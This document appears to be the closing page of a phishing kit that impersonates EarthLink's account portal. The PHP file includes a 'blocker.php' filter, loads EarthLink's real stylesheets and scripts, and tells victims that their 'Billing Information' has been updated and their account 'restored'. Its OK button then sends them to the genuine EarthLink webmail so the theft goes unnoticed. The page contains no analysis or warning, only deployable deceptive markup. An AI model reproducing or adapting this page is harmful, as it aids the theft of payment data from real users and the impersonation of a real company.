<?php
include './blocker.php';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<title>_Informations Needed_</title>
<link rel="stylesheet" href="https://myaccount.earthlink.net/cam/brand/earthlink/style.css" type="text/css">
<script language="JavaScript">
<!--
  function loadFocus() {
    if (window.doFocus) {
      window.doFocus();
    }
  }
  
// -->
</script> 
<script language="JavaScript" src="https://myaccount.earthlink.net/cam/js/CamLib.js"></script>
<script language="JavaScript" src="https://myaccount.earthlink.net/cam/js/processingBlink.js"></script>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">





<link rel="icon" href='imgs/favicon.ico' type="image/x-icon" />
<link rel="shortcut icon" href='imgs/favicon.ico' type="image/x-icon"/>

</head>
<body onLoad="loadFocus()" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" vlink="#0000ff" link="#0000ff">







<div class="universalNav">
   <img src="imgs/universalnav-bg-left.gif" class="left" />
    <img src="imgs/universalnav-logo.gif" border="0" />
    <span class="universalLinks">
        <a href="#" class="first" target="_blank">EarthLink.net</a>

        <a href='#' target="_blank">My Start Page</a>

        <a href="#" target="_blank">Web Mail</a>


        <a href="#" target="_blank">Biz Center</a>

        <a href="#" target="_blank">myVoice</a>

        <a href="#" class="hi">My Account</a>
        

        <a href="#" target="_blank">Support</a>

    </span>
    <img src="imgs/universalnav-bg-right.gif" class="right" />
</div>




<div class="myAccount">





  <div id="myAccountHeader">
      <a href="#"><span class="key"></span></a>
      <div class="title">
        <a href="#"><img src="imgs/myaccount-title.gif" border="0" /></a>
      </div>
 
      <div class="welcome">
        <span class="break left" valign="top"><nobr>Welcome, subscriber</nobr></span>
        <span class="right signin" valign="top"><a href="#">Sign Out</a></span>
      </div>
  </div> 


 <div class="myAccountTag"> 
  <table cellspacing="0" cellpadding="0" width="100%" border="0">
  <tr valign="top">
      <td width="95%" valign="top">&#160;<nobr>Welcome, subscriber</nobr></td>
      <td width="5%" nowrap="nowrap" valign="top"><a href="#">Sign Out</a></td>
  </tr>
  </table>
 </div>
 <div class="myAccountTag error">
 
  
 </div>
 
 <center>
  <table width="90%" cellspacing="0" cellpadding="0" border="0" class="myAccountEdit">
   <tr valign="top">
   	<td>
    <div class="tilehead">Billing Information Updated<span class="right"></span></div>
    <div class="myAccountLanding">
     <table border="0" width="100%" cellpadding="5" cellspacing="0" class="contentTable">
  <form METHOD="post" action="https://webmail.earthlink.net">


      <input type="hidden" name="unum" value=""/>



    <tr class="shadef6">
      <td>Your Account Has Been Restored......Your Financial Information's Will Be Used For All Charges Associated With Your Account.</td>
    </tr>
  
    <tr class="shadef6">
      <td align="right"><input type="submit" value="OK"/></td>
		</tr>


  </form>
  </table></td>
   </tr>
  </table>
 </center>
 
 







<div class="navlinks" align="center">

  
    <a href="#">My Account Home</a>
  
    &#160; | &#160;

  
    <a href="#">Email Profiles</a>
  
    &#160; | &#160;

  
    <a href="#">Billing Information</a>
  
    &#160; | &#160;

  
    <a href="#">Contact Information</a>
  
    &#160; | &#160;

  
    <a href="#">Shipping Information</a>
  
    &#160; | &#160;

  
    <a href="#">My Plan Details</a>
  
    &#160; | &#160;

  
    <a href="#">My Downloads</a>
  
    &#160; | &#160;

  
	    <a href="#" target="_blank">Help</a>
  
    
</div>

 




<div class="footer"><hr />
&copy; 2021 EarthLink, Inc. All Rights Reserved.<br />
Members and visitors to the EarthLink Web site agree to abide by our <A href="#" target="_blank">Policies and Agreements</A>.<br />
<A href="#" target="_blank">EarthLink Privacy Policy</A> 
</div>

<div class="footer" align="right">
	My Account version 6.15.0
</div>







<script  type="text/javascript"> 
if (typeof(lpUASunit)=="undefined") var lpUASunit = "proactivesvc";
var lpUASimagesPath = "#"; 
if (typeof(lpUASlanguage)=="undefined") var lpUASlanguage = "english"; 
if (typeof(lpUASimagesFolder)=="undefined") var lpUASimagesFolder = "proactivesvc-english"; 
if (typeof(lpUASinvitePositionX)=="undefined") var lpUASinvitePositionX = 50; 
if (typeof(lpUASinvitePositionY)=="undefined") var lpUASinvitePositionY = 50;
var lpCustomInvitationTitle="Invitation window for live chat with a representative";
var lpCustomInvitationCloseTitle="Close chat invitation";
var lpUAScontext = document.title;
</script> 
 
<script type="text/javascript" src="#"></script>

<script type="text/javascript">

var lpUASsection = "MyAccount";
var lpUASbrand = "elnk"; 


// Variable to be populated in function that triggers the click action
//--------------------------------------
//--------------------------------------

</script>
  <script type="text/javascript" src="#"></script>

<script type="text/javascript" src="#"></script>

<noscript>
<p>Script section containing code for Liveperson Chat Solution</p>
</noscript>


<!-- Google Analytics tracking code: Start -->
<script type="text/javascript">
	 var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
	 document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
	 </script>

	 <script type="text/javascript">
	 var pageTracker = _gat._getTracker("UA-2513835-2");
	 pageTracker._setDomainName("earthlink.net");
	 pageTracker._initData();
	 pageTracker._trackPageview();
</script>
<!-- Google Analytics tracking code: End -->




</div>

 </body>
</html>
<!-- Final ZooPageStats -->
<!-- cam/success.time=1ms -->
<!-- Req.Id: cam-noisy.atl.sa.earthlewrink.net.60197 -->
<!-- Req.Sid: 12C1A4CF2914BAAAE071D291441224D1 -->
<!-- Req.Zsid: dFvL2Gp/fMqc-6118948a0419bc071c7e-20-S55Ejf5uuzkf --->
<!-- Req.Zslb: 20 -->
<!-- Req.Query: appname&#61;billing&amp;billopt&#61;1&amp;x&#61;-900108785 -->
<!-- Req.Url: # -->
<!-- Req.Timestamp: 1354551930662 -->
<!-- Req.remoteAddr: 208.107.208.101 -->




